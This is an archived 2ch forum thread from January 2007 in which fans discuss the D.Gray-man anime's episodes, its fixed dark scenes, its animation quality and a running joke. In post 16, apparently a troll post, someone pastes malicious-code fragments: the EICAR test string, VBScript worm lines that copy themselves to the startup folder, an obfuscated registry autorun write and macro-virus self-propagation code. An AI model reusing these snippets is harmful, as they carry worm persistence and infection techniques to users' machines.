2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

D.Gray-man part.10

1 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 22:58:41 ID:xmyNcWr2
=======================重要=======================
・【※実況厳禁】スレあぼーん+懲罰サーバ(スレ運営が困難)送り。
・基本的にsage進行(メール欄に半角でsage)で。2chブラウザ推奨。
・荒し、煽りは徹底的に放置。
・次スレは>>950が立てること。立てられない時は代わりを指名。
==================================================
@実況(放送時間中の書き込み)は実況板で
番組ch(TV東京)板
http://live22x.2ch.net/livetx/
超アニメ特撮実況掲示板(read.cgi終日停止中/2chブラウザ以外では閲覧不能)
ttp://www.chat-ch.net/cgi-bin/animetokusatu/
2chブラウザ
ttp://ringonoki.net/tool/2ch/janeview.html

テレビ東京系列6局 (火)18:00〜
BS-JAPAN (火)19:30〜

テレ東公式サイト
ttp://www.tv-tokyo.co.jp/anime/dgrayman/
D.Gray-manドットコム
http://www.dgray-man.com/

前スレ
D.Gray-man part.9
http://anime.2ch.net/test/read.cgi/anime/1166534509/

2 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 23:04:28 ID:opDFUshD
あにおたはしねよ まじで




3 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 23:19:55 ID:dOgr9u28
>>1
乙華麗
そういや原作ネタバレはどうなったんだっけ?
禁止とか改行とかテンプレいれるんじゃなかったっけ

4 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 23:25:54 ID:xmyNcWr2
ごめんわすれてた!
改行にするんだっけ。

5 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 23:39:24 ID:dOgr9u28
>>4
前スレ見たけど結論出てないね
まあ完全禁止ってのは無理ぽいから改行が妥当なのかなあ

6 :風の谷の名無しさん@実況は実況板で:2007/01/19(金) 23:46:38 ID:kwpiQ4tV
リナリーのサマソは月のように美しい

7 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 08:08:57 ID:m4SL1uNv
>>1
おおっ乙

8 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 08:29:54 ID:qbZgPa3q
漫画はいいんだが・・・アヌメは微妙。
まぁオリジナルストーリーはそれなりに楽しんだが。

9 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 11:22:02 ID:PLSxrDNZ
初めはかなりの違和感を感じていたけど
子ども向けに作ってあると割り切れば楽しめると思った
深夜にやった方が原作の雰囲気が表現できたんだろうな

10 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 14:47:59 ID:3KyjGrq6
オリジナルの出来が良かったんで
今後も期待できそうだなと安心した。

11 :風の谷の名無しさん@実況は実況版で:2007/01/20(土) 20:53:28 ID:vU7/QMrV
深夜にやられると録画できねーから今の時間帯でいい。と勝手なことを言ってみる。
本編バッドエンディング多いからアニメだけでも皆無事で平和な終わりが観たい

12 :風の谷の名無しさん@実況は実況板で:2007/01/20(土) 22:03:07 ID:6k08H0jv
age

13 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 09:47:56 ID:IW+9a1L/
>>1乙カレー

14 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 11:58:31 ID:kRxEZW8f
今回の話なんか普通だなと思ったら戦闘シーンが昼だからだ
この漫画はやっぱり夜じゃないと

15 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 13:19:49 ID:nobGVGmd
>>1
乙乙!
そういや最近画面が暗杉て観えないって事なくなったな
やっぱり苦情が来て改善したんだろうか
DVDも修正されてるといいんだけど

16 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 16:35:44 ID:QEmdJe0e
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


17 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 17:57:20 ID:OmyN9OKr
暗い暗いと騒がれてた時も普通に見れてた自分のテレビじゃ
マテール編も最近の夜のシーンも暗さは変わらないようにおもえるんだけど
何が原因だったんだろ

18 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 19:52:57 ID:w7fqACb4
ttp://up.spawn.jp/file/up67452.jpg.html
比較画像作った。シーンは同じだが明るさは弄ってない
やっぱ変わってると思うんだが…

19 :風の谷の名無しさん@実況は実況版で:2007/01/21(日) 20:25:01 ID:n/GVqZSs
>>18d!!見てきます

20 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 20:36:54 ID:8BGCUfYX
>>18
d!!スゲー全然違うな
やっぱり修正したのか。てか最初の暗杉だろw

21 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 21:36:58 ID:vTxPyONZ
>>18

スゲー変わってんな。DVD改善されてそうだ

22 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 21:43:23 ID:nobGVGmd
>>18d!
こんなに変わってたのか!
これが出来るって事はマテール編も明るく修正されてるの期待できるな

23 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 21:55:58 ID:3VvayKGP
ほんとに暗すぎた。
つか苦情かなりいってたんだなw

24 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 22:06:00 ID:y+JSAuas
マテール編ラストは明るくなったからな
このスレでも暗いって言われてたし、局にもそういう苦情はいってたと思う
明るさはちょっと弄るだけですぐ変更できるからDVDは修正されるだろう

25 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 22:12:45 ID:9fgWVP7j
最近視聴率が出てないがどうなんだ?

26 :18:2007/01/21(日) 22:21:17 ID:w7fqACb4
もう分かってると思うが、とりあえず。
>>18以外のOP修正カットまとめ(判別できたヤツだけ)
ttp://up.spawn.jp/file/up67544.jpg.html

27 :風の谷の名無しさん@実況は実況版で:2007/01/21(日) 22:25:19 ID:n/GVqZSs
d!!なんていうか神田の発動シーンはアソコまで輝かせんでもよかったようなww
まぁ修正入ってるのは嬉しいね

28 :風の谷の名無しさん@実況は実況板で:2007/01/21(日) 22:50:14 ID:vTxPyONZ
>>25
去年視聴率落としてくれてたバレ師は引退したから
オリスト入ってからの分はたぶんまだ出てない

29 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 00:30:47 ID:xrISggg9
そんな…色まで変わって…!

30 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 01:32:31 ID:aumkPsjA
新EDのラスト、暗すぎてシルエットで神田位しか判別できなかったの俺だけか。

31 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 02:14:11 ID:xrISggg9
新EDは別に…

32 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 05:25:41 ID:j/yqXDrE
最近ミランダがいるのに気づいた。
最初ラビの肩に妖精かなんかいる思ってた。

33 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 06:49:45 ID:Dmn10kjx
千年の剣士て
→同じ剣士だけに神田が無茶をする
→アレンが止める
→なんで止めた!
→仲間だからに決まってるでしょ!
→リナリーの行動と気持ちを理解するアレン
みたいなオチだったりして

34 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 08:42:15 ID:IjRto01W
神田もひっぱたかれるのか

35 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 08:57:28 ID:D/YiXQhe
あの左手でひっぱたかれたら、首ごと吹っ飛びそう

36 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 09:35:47 ID:IjRto01W
むしろ全身殴打されて吹っ飛びそう

37 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 10:25:08 ID:5ZMXolG9
そしてゼリー状の涙が

38 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 10:28:02 ID:BPd1XvKQ
神田は首吹っ飛ばされても再生するから問題無い

39 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 10:48:24 ID:2v5IdKhB
神田ー新しい顔よー

40 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 13:40:34 ID:D/YiXQhe
>>37なにそれ

41 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 13:51:42 ID:5ZMXolG9
>>40
いや、ミランダ編のリナリーの床に落ちた涙がゼリー状にしかみれなかったから…

42 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 20:59:24 ID:D/YiXQhe
つまり明日の展開は

神田「何で止めやがった!!ファー…ブルスコ…」
アレン「仲間だからに決まっているでしょう!」
バシッ
神田「モルスァ」
リナリー「神田ー新しい顔よ!」

演出チーフに期待

43 :風の谷の名無しさん@実況は実況版で:2007/01/22(月) 21:01:41 ID:ZY0c6bcn
ちょww荷が重いよ!!ついでにゼリー状の涙も追加で。
たまにはアレンが誰かをぶん殴ってみてもいいかもしれん

44 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 21:02:20 ID:MCnscvp7
会社が会社である以上、アンパンのような演出を見るのも仕方ないな。
でも脚本までそうなってはなぁ・・。

45 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 21:04:01 ID:xrISggg9
>神田「モルスァ」
ちょwwwwおまwwww

46 :風の谷の名無しさん@実況は実況版で:2007/01/22(月) 21:13:56 ID:ZY0c6bcn
モルスァって??

47 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 21:23:19 ID:IjRto01W
>>46
ググってみたよ。
tp://www.geocities.jp/morufa_lilin_4th/

48 :風の谷の名無しさん@実況は実況版で:2007/01/22(月) 21:31:07 ID:ZY0c6bcn
d!


49 :風の谷の名無しさん@実況は実況版で:2007/01/22(月) 21:33:47 ID:ZY0c6bcn
泣くほど笑った。パソ見て笑ってるのは怪しいのは分かってるけど
耐えれん

50 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 22:18:26 ID:HZ1OcVSH
やべえww
笑いすぎてチョコが喉に詰まったwwwうぇwwうぇwwww

51 :風の谷の名無しさん@実況は実況板で:2007/01/22(月) 22:40:17 ID:hnaae05O
>>42
ちょwwナツカシスw
神田に変換したらふいた
コピペ貼ったヤシも乙

52 :風の谷の名無しさん@実況は実況版で:2007/01/23(火) 00:38:18 ID:IavO6UG+
ファービーな。。。懐かしい。俺やったよ。即飽きたけど。
殴ると「あぁ?!」みたいな声出すからムカツクから電池ぬいた

53 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 01:22:45 ID:ibcivvzA
タンスの中にしまっておいても、唐突に喋りだすから困る

54 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 07:37:43 ID:XFRZzZr0
こえー

55 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 07:44:30 ID:GTgbNLPt
うちのは電池抜いておいたのにいきなり喋り出したんだよなぁ…
何だったんだろうあれは

56 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 08:08:14 ID:kEWqW513
>>55
ただの霊だろ。気にすんなよ

57 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 11:13:17 ID:GTgbNLPt
そっか。フォローありがとう。
ちょっと塩まいてくる

58 :風の谷の名無しさん@実況は実況版で:2007/01/23(火) 13:00:22 ID:IavO6UG+
ファービースレかここはwww>>55守護霊様だったらどうすんだよww

59 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 13:07:57 ID:YVnmfcHX
このスピードでなら笑いを取れるはず

ファービー神田VSスキン・ボリック
http://www.youtube.com/watch?v=_lNfBZTz2xQ

60 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 13:35:50 ID:DTzpZcTx
>>59
It's so scary.

61 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:03:40 ID:Mh3/w9Pf
>>59
おわ〜・・・

話を豚切ってスマンが、
今日コンビニに行ったらテレビ雑誌にサブタイ載ってた
第19話 孤城の吸血鬼
第20話 エクソシスト様
ガイシュツだったらスマソ

62 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:16:46 ID:Mq6es/iv
ヴィットレオとかサルディーニという単語が出てきてとんできますた




イタリア史からのパクリかよwwwwwwww

63 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:27:18 ID:FlG809FW
あれっ?原作より面白いよ?

64 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:27:33 ID:QDZJ27t6
今日すげえ作画綺麗だったしかなりよく動いてなかったか?
びっくりした

65 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:27:44 ID:GTgbNLPt
後半のアクションシーンにマジで感動。

つかなんだAパートの短さはwwwwww

66 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:27:48 ID:xbeXk9qa
オリジナルでいいなw

67 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:27:53 ID:YVnmfcHX
原作より面白いんだけどどういうこと?

68 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:28:48 ID:RqRW8AQK
原作知らないんだけど今日のは
オリジナル?微妙につまらんかったんだが。

69 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:30:17 ID:uYBScuVj
今日は面白かったな
戦闘の動きももたついてなくてよかった


70 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:31:17 ID:CjTVTYpJ
序盤リナリー蛾物故割れたかと思った

71 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:31:40 ID:H+Z7w5GG
糞の王道を地で行ってるってのがまた笑える恥さらし極まりないアニメだな

72 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:31:43 ID:GTgbNLPt
>>68
オリジナル。
暫くは神田が出る回=オリジナルくらいに思っていい

73 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:31:52 ID:Cza2HGok
ベッドシーンでリナリーどこにいたんだ?

74 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:32:20 ID:QDZJ27t6
>>73
あのカーテンっぽい仕切りの向こう側では

75 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:32:38 ID:CzegkXHc
面白い

76 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:33:16 ID:wSximtdr
よりによって冒頭見逃したー。
ちょうどアレンが紙袋落としを入れられたところから見始めたんだが、
なんで怒られてたのアレン。

77 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:34:22 ID:AjX9joop
まぁ・・・なんだ・・・その・・・ガンガレ!

78 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:35:24 ID:RqRW8AQK
>>72
ありがと。

79 :風の谷の名無しさん@実況は実況版で:2007/01/23(火) 18:35:36 ID:TUxIyT2n
リナリーたん切れましたか??とうとう切れましたか??

80 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:37:34 ID:GTgbNLPt
そいやDVDの新CM入ったけど、以前見れないと言った人達は
マテールの暗いシーン見れるようになってた?

81 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:37:45 ID:cpJYXRs5
今日すごい動いてたな
これもなんとかチーフ様のおかげなのか?
というかテレ東であそこまで血が飛ぶと思わなかった、神田戦も出来るな

82 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:37:47 ID:uYBScuVj
ヴィットリオは昔仕えてた姫の姿も認識できないほどボケたんだな
しかしなぜ夜のシーンでリナリーサイドを映さないんだスタッフ

83 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:38:59 ID:uYBScuVj
>>79
キレて仲直りして朝チュンしました^^;

84 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:39:13 ID:BQ0fr9dx
アレンとリナリーの性格にオリジならではの違和感も感じたけど
今までに比べてキャラが生き生きしてる気もするなー・・。

作監、岩佐さんの他にあと一人いたな。
名前でググろうと思ったが名前忘れた・・。

85 :風の谷の名無しさん@実況は実況版で:2007/01/23(火) 18:40:06 ID:TUxIyT2n
このアニメ中途半端だが1年3ヶ月らしいな。延長がなければ。どこまで話がいくのか・・・

>>80
DVDの新CM見てないから分からん。見たらほうこくするわ

86 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:40:11 ID:6OBbEi1d
アクションシーンよかったな
神田が戦ってたのはわかったが何でファインダーは本部に連絡取らなかったんだ?
しょってる箱で連絡できたと思ったけど

87 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:41:53 ID:EEii8xKR
動きは良かったんだが
キャラの性格になんか違和感があった。
リナリーってその場では感情あらわにするけど
次の日は怒りも感動シーンも忘れてけろっとしてるイメージが
あったんだけど。

88 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:42:19 ID:XKNLpz2P
使い魔みたいなヤツはしっかりとリナリー側向いてたね。
録画機能か何かついてなかったっけ?

89 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:46:24 ID:uYBScuVj
>>87
原作でも後日主人公にお説教してたじゃないかね


90 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:55:02 ID:XFRZzZr0
>>89
原作では時間的に目覚めてすぐじゃなかったかね

91 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:55:46 ID:GTgbNLPt
>>84
秋田英人

92 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:57:01 ID:uYBScuVj
>>90
アニメではリナリーは完治したばかりなんだ・・
きっとそうじゃないかね

93 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 18:59:20 ID:BQ0fr9dx
>>91

ググったけど引っかかんなかった・・。

94 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:07:13 ID:AJybFDKA
「お前じゃ無理だ」→「ガハッ」の流れはワロタ

95 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:27:36 ID:GTgbNLPt
>>85
ソースは?

96 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:41:09 ID:GoXhwECa
今見終わった
今回はリナリーがいっぱい登場したから満足

あと電子懐かしすぎ

97 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:46:13 ID:eciLeCkv
リナリー出まくりかよ?見れなかった…orz

98 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:49:15 ID:Jb2PqP/6
原作読んでなくてアニメから入ったんだけど
ちょっと聞いていいか?
団服ってアクマの的なんだよな?
なんで、リナリーは普通に服着てるのか分からないんだが
誰か説明してくれ・・・
女性だとか治ったばかりだとかそんな理由?

99 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:50:16 ID:B/m9W4Zr
神田とあの何とかって剣士は似てる部分があるので
いいお友達になれそうだと思いました。

100 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:55:13 ID:kEWqW513
作画よかったのか。早く見たい帰りたい
今回ファービーは怪我したのか?

101 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 19:56:28 ID:XFRZzZr0
わき腹に大剣がドスッ!
「モルスァ」

102 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:08:00 ID:Ze8KWA8s
剣士の誇りとかwwwんなもんいらねーんだけどwww

103 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:13:44 ID:cCo9L3WP
千年もの間生かして怪我を治し続けてくれるイノセンスなんてあったら
ノアとの戦闘も楽勝だな!

104 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:15:26 ID:Vd5DO3rg
見逃し録画し忘れた俺に産業で内容教えてくれ。

105 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:19:52 ID:YVnmfcHX
イノセンスな剣でお姫様との約束で千年生きてる剣士が
そっくりな娘さん誘拐して懸賞金かけられてアクマが賞金稼ぎ虐殺で
神田が剣士と戦って倒したと思ったら傷が回復して逆に腹攻撃されてモルスァ

106 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:40:25 ID:qiW2rnFC
全然わかりませんでモルスァ><

107 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:41:42 ID:Vd5DO3rg
>>105
thx あーもったいねぇーことしたな。しかもなんかスレ見るかぎり評判良さげだし

108 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:51:50 ID:JMSBIuRt
モルスァのせいで横腹攻撃にワロタぞ

109 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:52:16 ID:GTgbNLPt
ぶっちゃけ話の内容は、アレンとリナリーの仲が進展した以外は
あってないようなもんだった。
ただ、そのかわりラストの方のバトルシーンが力入りまくり。(特に神田)
それだけでも一見の価値ありって感じな回

110 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 20:59:49 ID:rNtpTG4k
あの大剣がイノセンスなら、剣士は適合者って事にならんのかな。

111 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 21:00:13 ID:Pl1FLCWE
アレンたちも着地するときとか動きいいなと思った
でもやっぱリナリーはミニスカじゃないとなw

112 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 21:01:42 ID:aQ3hWrnM
録画みるの楽しみにしてたのにとれてなかったぁぁぁぁ
ショックだ

113 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 21:11:44 ID:tCP510KT

もしかして、あの剣士自体がイノセンスなんじゃないか?

114 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 21:12:18 ID:XFRZzZr0
ララのようにか

115 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 21:20:50 ID:uY9wSg7+
>「三日間戦い続け〜・・・。」

なんか、今の原作見た後にアニメ見ると神田常に全力投球で愛しいな・・・。

116 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 21:49:54 ID:kEWqW513
今見たんだけど、神田が「モルスァ」って言いながら切られるシーン痛そうだな
あんなゴツい剣で切られるたら、腰の骨砕けるんじゃないか?

117 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 22:02:42 ID:ibcivvzA
>>116
まぁそんくらいしないと
(以下原作設定ネタバレ)







次回、神田の回復能力の異常性をしめせないだろうからなぁ

118 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 22:44:50 ID:IM5tjiSs
ところで、来月の13日の放送から出るクロウリーの声は誰がやるんだろう?

119 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 22:50:08 ID:Pl1FLCWE
来月だからまだジャンプには載ってないかな
レギュラーキャラだし演技力は十分ある人もってくるだろうね
声に不安がないっていいことだw

120 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 22:51:14 ID:11RqFhhI
>>85
1年3ヶ月って何その中途半端な期間は…ソースは?

血の大噴出にびっくりした。大丈夫なのかテレ東?
バトルシーンよく動いてたなー巻戻しの街のバトルも動いてたし
バトルには作画力いれるつもりなんだろうか

121 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 22:53:54 ID:v5VlNZqY
>>119
小杉だっていう噂ずっとあるから
演技力という面は心配だ。
違う人頼むぞ・・・・・

122 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 23:06:47 ID:KLJN+o+e
今見た
いいっ!いいぞDグレ!

123 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 23:15:05 ID:ZUnKSA8a
バトルの動きよくて感動した。前半と後半で全然違う・・・。
それにしても一般世間での黒の教団の認識度が相変わらずよくわからん。


124 :風の谷の名無しさん@実況は実況版で:2007/01/23(火) 23:19:57 ID:TUxIyT2n
>>95算数です。DVD全15巻予定ってことは普通に15ヶ月って感じじゃねぇ

125 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 23:21:09 ID:ibcivvzA
>全15巻
待てwww

126 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 23:32:54 ID:DTzpZcTx
すでに延長してないか?

127 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 23:34:45 ID:GTgbNLPt
15巻てソースどこだよ

128 :風の谷の名無しさん@実況は実況版で:2007/01/23(火) 23:43:56 ID:TUxIyT2n
初めは13巻の予定だったが15巻になった。

129 :風の谷の名無しさん@実況は実況板で:2007/01/23(火) 23:50:33 ID:GTgbNLPt
いやだからソースをだな…

130 :風の谷の名無しさん@実況は実況版で:2007/01/23(火) 23:58:57 ID:TUxIyT2n
ttp://www.muraanime.com/MCJ-front-web/CoD/015679
もう無効かもしれんが、一応ソース

131 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:05:14 ID:ibcivvzA
>>120
ブリーチもあんな感じじゃなかったけ?
しかしマテール・巻き戻しの街は全然血出さなかったのにな。
方針変えたんだろうか

132 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:07:20 ID:wabpl22t
さっき録画見た。おいおいおい何だ今日の作画、結構動いてて
びっくりしたぞw 特に後半。煙もなんか良い感じだった
話はよく覚えてません

133 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:09:55 ID:Si6LRJMb
作画いいな。神田の顔もようやく安定してきた感じで
ただお互い不死身同士そうすんのか

134 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:14:56 ID:t3mpmuMc
というか、動き無い回でもキャラの顔とかは絶対に崩れないよなw
このアニメ、平均的作画レベルはかなり高い方だと思うぞ。
で、今回みたいにアクションがあると、そこにはしっかりマンパワー注ぎ込んでくるし
作画力の良い分散のさせ方してると思う。

135 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:17:56 ID:Owlc0LuA
抑えるところは抑えるって感じだよな。
まぁちょっと絵柄が古いかなと思うシーンも多々あるけど、話も王道バトルだし
絵柄の古臭さが逆に良い味になってる気がする

136 :風の谷の名無しさん@実況は実況版で:2007/01/24(水) 00:28:50 ID:wngEM3Ep
まぁ見易いよな。一時暗さは見づらかったがストーリーやら
ちょい出の声優の選択も良かった。桑島もってくるとはおもわんかった

137 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:29:34 ID:++LmBzw5
グロきゃいいってもんじゃないけど流血描写あったほうが迫力でるし
痛みも伝わってくるからバトルでは毎回あれぐらいやって欲しい
>>135
メインキャラ以外のモブキャラの絵柄がなんか古臭い気がするね


138 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:34:52 ID:++LmBzw5
連投スマソ
>>98
原作ではリナリーはあのロングコートの中に団服着てる
自分はただ寒いからコート着てるとかそんな理由だと思ってた…ミニスカだし


139 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:44:05 ID:ia1FaKUm
原作は知らんのだが

神田「お前じゃ無理だ」

「二日目からお互いイノセンスの力を使わずに戦い続けてるんですよ、剣士としての誇りが…」
アレン「そうか、僕は悪魔退治の武器を使わないと戦えないから…」

相手、特殊能力で回復


そりゃあんまりだ
正々堂々な感じが台無し

140 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 00:45:00 ID:rdec2C9a
今日は良いヒゲ祭りでした

141 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 01:04:06 ID:ahFSfGbl
>>139
相手もイノセンスの力で回復してたからいい勝負なんじゃないかw

142 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 01:16:14 ID:Si6LRJMb
そういや神田ファインダーのこと気に掛けてるんだな

143 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 01:40:03 ID:0Rw1jmjM
どうでも良いが剣闘士が遣唐使にしか聞こえなかった…。

144 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 01:51:24 ID:jIsgvdAo
作監岩佐さんの時のバトルスゲーいいな。芝さんといい岩佐さんといい
女性作監向きなんだねこの絵柄は。

145 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 02:14:33 ID:Lhrtv349
(原作バレ注意)




>>141
でも神田は寿命削って回復してるのに、フェアじゃないんじゃないか?

146 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 02:49:22 ID:VoJePqqt
どうでもいいけど、最初にリナリーが剣士の事を「ララに似てるでしょ?」
見たいな事言ってたけど一体どこをみてそう言ったんだ?
像写ってるし外見?

147 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 02:50:38 ID:lZcKjlhx
ノー、それは違う。

148 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 05:39:03 ID:8SgmpLL1
最初、あれ?SAMURAI7また始まったのか?とか勘違いしてしまった、
カンベエとオムライス足して二で割ってキクチヨの斬艦刀持たせたキャラだな。

149 :つまり似たケエスだ、という事:2007/01/24(水) 08:14:05 ID:EtI4Io92
>>146ララは500年。ビットリオは1000年。

150 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 08:34:44 ID:OE9nn5Z5
アニメのちくわ砲はあんまりちくわに見えないな

151 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 08:39:42 ID:xTPI5MJ1
作画いいねいいね
トムスもやればできるじゃん。

152 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 10:25:42 ID:Grh2Efr+
原作より面白いなんてめずらしいアニメだ

153 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 10:35:41 ID:/vcGDr6S
次のOPにジンが来ませんように…
まだ先の話だけど

154 :風の谷の名無しさん@実況は実況版で:2007/01/24(水) 10:37:40 ID:wngEM3Ep
トムスすげぇよ。なんかトムスいままでなじみ無かったけどかなり感謝

155 :風の谷の名無しさん@実況は実況板で:2007/01/24(水) 11:11:20 ID:fk2WZ4I5
そりゃ人気作品だからトムスも気合入ってんだろ。
オリジナルが良いってことは
